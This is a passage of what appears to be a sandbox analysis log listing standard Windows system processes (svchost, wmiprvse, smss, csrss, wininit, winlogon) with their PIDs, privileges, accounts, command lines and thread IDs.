0xa84 Thread: id = 43 os_tid = 0xbd0 Thread: id = 44 os_tid = 0xbd8 Thread: id = 45 os_tid = 0x6cc Thread: id = 46 os_tid = 0x42c Thread: id = 47 os_tid = 0x1e4 Thread: id = 48 os_tid = 0x6d0 Thread: id = 49 os_tid = 0x6bc Thread: id = 50 os_tid = 0x6b0 Thread: id = 51 os_tid = 0x698 Thread: id = 52 os_tid = 0x684 Thread: id = 53 os_tid = 0x678 Thread: id = 54 os_tid = 0x4a8 Thread: id = 55 os_tid = 0x46c Thread: id = 56 os_tid = 0x44c Thread: id = 57 os_tid = 0x424 Thread: id = 58 os_tid = 0x41c Thread: id = 59 os_tid = 0x404 Thread: id = 60 os_tid = 0x14c Thread: id = 61 os_tid = 0x3fc Thread: id = 62 os_tid = 0x3f4 Thread: id = 63 os_tid = 0x3e8 Thread: id = 64 os_tid = 0x39c Thread: id = 65 os_tid = 0x390 Thread: id = 66 os_tid = 0x37c Thread: id = 67 os_tid = 0x374 Thread: id = 68 os_tid = 0x1c4 Thread: id = 69 os_tid = 0x8e0 Thread: id = 70 os_tid = 0x35c Thread: id = 71 os_tid = 0xba4 Thread: id = 72 os_tid = 0x360 Thread: id = 73 os_tid = 0x688 Thread: id = 74 os_tid = 0x5b0 Thread: id = 75 os_tid = 0x330 Thread: id = 76 os_tid = 0x648 Thread: id = 77 os_tid = 0x7e8 Thread: id = 78 os_tid = 0x980 Thread: id = 79 os_tid = 0xa8c Thread: id = 80 os_tid = 0x7f0 Thread: id = 81 os_tid = 0x6b8 Thread: id = 82 os_tid = 0xa48 Thread: id = 83 os_tid = 0xbcc Thread: id = 84 os_tid = 0x83c Thread: id = 85 os_tid = 0x534 Thread: id = 86 os_tid = 0x9f0 Thread: id = 87 os_tid = 0x914 Thread: id = 88 os_tid = 0x4a0 Thread: id = 109 os_tid = 0xbec Thread: id = 110 os_tid = 0x434 Thread: id = 111 os_tid = 0x8c4 Thread: id = 112 os_tid = 0x950 Thread: id = 113 os_tid = 0xa20 Thread: id = 114 os_tid = 0x3a4 Thread: id = 115 os_tid = 0x7a8 Thread: id = 116 os_tid = 0x8b4 Thread: id = 117 os_tid = 0x570 Thread: id = 126 os_tid = 0xd4 Thread: id = 127 os_tid = 0xe0 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 89 os_tid = 0x79c Thread: id = 90 os_tid = 0x638 Thread: id = 91 os_tid = 0x554 Thread: id = 92 os_tid = 0x720 Thread: id = 93 os_tid = 0x668 Thread: id = 94 os_tid = 0x65c Thread: id = 95 os_tid = 0x144 Thread: id = 96 os_tid = 0x110 Thread: id = 97 os_tid = 0x3f0 Thread: id = 98 os_tid = 0x3ec Thread: id = 99 os_tid = 0x3e4 Thread: id = 100 os_tid = 0x3e0 Thread: id = 101 os_tid = 0x3d0 Thread: id = 102 os_tid = 0x3cc Thread: id = 103 os_tid = 0x398 Thread: id = 104 os_tid = 0x394 Thread: id = 105 os_tid = 0x384 Thread: id = 106 os_tid = 0x380 Thread: id = 107 os_tid = 0x350 Thread: id = 108 os_tid = 0x33c Thread: id = 128 os_tid = 0xa9c Thread: id = 132 os_tid = 0xab8 Process: id = "13" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x1bf97000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006793c" [0xc000000f] Thread: id = 118 os_tid = 0x55c Thread: id = 119 os_tid = 0x694 Thread: id = 120 os_tid = 0x4fc Thread: id = 121 os_tid = 0x8e4 Thread: id = 122 os_tid = 0x6d8 Thread: id = 123 os_tid = 0x7dc Thread: id = 124 os_tid = 0x738 Thread: id = 125 os_tid = 0xcc Thread: id = 131 os_tid = 0x7c8 Process: id = "14" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 133 os_tid = 0x8 Thread: id = 134 os_tid = 0xc0 Thread: id = 135 os_tid = 0x28 Thread: id = 136 os_tid = 0x44 Thread: id = 137 os_tid = 0x5c Thread: id = 138 os_tid = 0x4c Thread: id = 139 os_tid = 0x40 Thread: id = 140 os_tid = 0x30 Thread: id = 141 os_tid = 0x98 Thread: id = 142 os_tid = 0xb4 Thread: id = 143 os_tid = 0x38 Thread: id = 144 os_tid = 0xc4 Thread: id = 145 os_tid = 0xcc Thread: id = 146 os_tid = 0xd0 Thread: id = 147 os_tid = 0xb8 Thread: id = 148 os_tid = 0xd4 Thread: id = 149 os_tid = 0xd8 Thread: id = 150 os_tid = 0xdc Thread: id = 152 os_tid = 0xe8 Thread: id = 153 os_tid = 0x9c Thread: id = 154 os_tid = 0x3c Thread: id = 155 os_tid = 0x34 Thread: id = 157 os_tid = 0xf4 Thread: id = 159 os_tid = 0x48 Thread: id = 160 os_tid = 0x2c Thread: id = 161 os_tid = 0x100 Thread: id = 162 os_tid = 0x104 Thread: id = 163 os_tid = 0x108 Thread: id = 164 os_tid = 0x8c Thread: id = 165 os_tid = 0x80 Thread: id = 166 os_tid = 0x10c Thread: id = 167 os_tid = 0x110 Thread: id = 168 os_tid = 0x118 Thread: id = 169 os_tid = 0x64 Thread: id = 170 os_tid = 0x78 Thread: id = 171 os_tid = 0x90 Thread: id = 175 os_tid = 0x130 Thread: id = 176 os_tid = 0x134 Thread: id = 177 os_tid = 0x138 Thread: id = 178 os_tid = 0x13c Thread: id = 183 os_tid = 0xb0 Thread: id = 197 os_tid = 0x68 Thread: id = 198 os_tid = 0x24 Thread: id = 199 os_tid = 0x190 Process: id = "15" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cbdc000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 151 os_tid = 0xe4 Thread: id = 156 os_tid = 0xec Thread: id = 172 os_tid = 0x11c Thread: id = 184 os_tid = 0x160 Process: id = "16" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2c401000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 158 os_tid = 0xfc Process: id = "17" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c755000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 173 os_tid = 0x124 Process: id = "18" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c155000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x120" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 174 os_tid = 0x12c Thread: id = 179 os_tid = 0x140 Thread: id = 180 os_tid = 0x144 Thread: id = 181 os_tid = 0x148 Thread: id = 182 os_tid = 0x14c Thread: id = 192 os_tid = 0x184 Thread: id = 200 os_tid = 0x198 Thread: id = 201 os_tid = 0x19c Process: id = "19" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x1a75b000" os_pid = "0x150" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 185 os_tid = 0x154 Process: id = "20" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x1a65b000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x120" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 186 os_tid = 0x15c Thread: id = 194 os_tid = 0x188 Thread: id = 195 os_tid = 0x18c Process: id = "21" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x1a303000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x150" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 187 os_tid = 0x168 Thread: id = 188 os_tid = 0x16c Thread: id = 189 os_tid = 0x170 Thread: id = 190 os_tid = 0x174 Thread: id = 191 os_tid = 0x178 Thread: id = 196 os_tid = 0x194 Process: id = "22" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1a809000" os_pid = "0x17c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x150" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 193 os_tid = 0x180